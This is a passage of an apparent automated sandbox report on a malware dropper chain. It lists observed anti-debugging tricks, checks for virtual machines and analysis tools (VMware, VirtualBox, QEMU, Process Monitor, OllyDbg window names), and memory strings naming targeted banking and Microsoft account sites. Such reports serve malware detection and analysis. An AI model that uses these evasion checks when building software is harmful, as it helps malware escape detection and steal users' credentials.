                                Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AED83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00007FF67AED83B0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AED92F0 FindFirstFileExW,FindClose,5_2_00007FF67AED92F0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEF18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF67AEF18E4
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AED92F0 FindFirstFileExW,FindClose,6_2_00007FF67AED92F0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AED83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,6_2_00007FF67AED83B0
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEF18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,6_2_00007FF67AEF18E4
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxtrayZ
                                Source: getmac.exe, 00000046.00000003.2616665075.0000015F4B8EE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000002.2619297587.0000015F4B90E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616200120.0000015F4B8DB000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616200120.0000015F4B900000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616665075.0000015F4B900000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616812229.0000015F4B90D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
                                Source: FuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmpBinary or memory string: VMware
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                                Source: 8ZVMneG.exe, 00000054.00000003.2855490100.0000000003BF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                                Source: skotes.exe, 00000003.00000002.7284592983.0000000001310000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2591687772.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2986166870.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2601233115.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2641077930.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000002.2992431014.000001FA2DFF8000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2537129441.000001FA2DFF1000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2491526222.000001FA2DFF9000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000002.2619297587.0000015F4B90E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616200120.0000015F4B900000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616665075.0000015F4B900000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: m9sfEU9.exe, 00000051.00000003.2645107940.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                                Source: FuturreApp.exe, 00000055.00000002.7284709155.00000000050D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWj
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmsrvcZ
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
                                Source: 8ZVMneG.exe, 00000054.00000003.2855490100.0000000003BF3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmusrvcZ
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                                Source: skotes.exe, skotes.exe, 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000059.00000002.2798355053.0000000000889000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicer6
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                                Source: file.exe, 00000000.00000003.2213884609.0000000000C04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
                                Source: getmac.exe, 00000046.00000003.2617329269.0000015F4B921000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616200120.0000015F4B900000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616665075.0000015F4B900000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616610537.0000015F4B91F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                                Source: FuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxserviceZ
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicer6Z
                                Source: D1UL0FG.exe, 00000006.00000003.2806746035.000001FA2E72F000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2806746035.000001FA2E772000.00000004.00000020.00020000.00000000.sdmp, D1UL0FG.exe, 00000006.00000003.2806171979.000001FA2E5B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                                Source: skotes.exe, 00000003.00000002.7284592983.00000000012CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@F1
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                                Source: D1UL0FG.exe, 00000006.00000002.2993365618.000001FA2E130000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
                                Source: m9sfEU9.exe, 00000051.00000003.2645107940.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                                Source: getmac.exe, 00000046.00000003.2617329269.0000015F4B921000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616200120.0000015F4B900000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616610537.0000015F4B91F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
                                Source: getmac.exe, 00000046.00000002.2619297587.0000015F4B90E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616200120.0000015F4B900000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616665075.0000015F4B900000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616812229.0000015F4B90D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareuserZ
                                Source: FuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmpBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qemu-gaZ
                                Source: getmac.exe, 00000046.00000003.2617329269.0000015F4B921000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616200120.0000015F4B900000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616610537.0000015F4B91F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
                                Source: FuturreApp.exe, 00000055.00000002.7288711538.000000006BD70000.00000002.00000001.01000000.00000027.sdmpBinary or memory string: VMWare
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmtoolsd
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwarec
                                Source: getmac.exe, 00000046.00000003.2616665075.0000015F4B8EE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2616200120.0000015F4B8DB000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000003.2617043696.0000015F4B8EF000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000046.00000002.2618217490.0000015F4B8EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"
                                Source: D1UL0FG.exe, 00000006.00000003.2481469057.000001FA2E2A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwaretrayZ
                                Source: file.exe, 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2310649956.0000000000889000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000059.00000002.2798355053.0000000000889000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                                Source: d0ef52de9f.exe, 0000005F.00000003.2853107923.00000000037CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                                Anti Debugging

                                barindex
                                Hides threads from debuggers
                                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebugger
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeThread information set: HideFromDebugger
                                Tries to detect sandboxes and other dynamic analysis tools (window names)
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeOpen window title or class name: regmonclass
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeOpen window title or class name: gbdyllo
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeOpen window title or class name: procmon_window_class
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeOpen window title or class name: ollydbg
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeOpen window title or class name: filemonclass
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: NTICE
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: SICE
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeFile opened: SIWVID
                                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeProcess queried: DebugPort
                                Source: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exeProcess queried: DebugPort
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04AC069B rdtsc 0_2_04AC069B
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEDD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF67AEDD19C
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8AA6EE0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,6_2_00007FF8A8AA6EE0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0029652B mov eax, dword ptr fs:[00000030h]0_2_0029652B
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0029A302 mov eax, dword ptr fs:[00000030h]0_2_0029A302
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_006CA302 mov eax, dword ptr fs:[00000030h]2_2_006CA302
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_006C652B mov eax, dword ptr fs:[00000030h]2_2_006C652B
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006CA302 mov eax, dword ptr fs:[00000030h]3_2_006CA302
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_006C652B mov eax, dword ptr fs:[00000030h]3_2_006C652B
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEF34F0 GetProcessHeap,5_2_00007FF67AEF34F0
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEDD37C SetUnhandledExceptionFilter,5_2_00007FF67AEDD37C
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEDD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF67AEDD19C
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEDC910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF67AEDC910
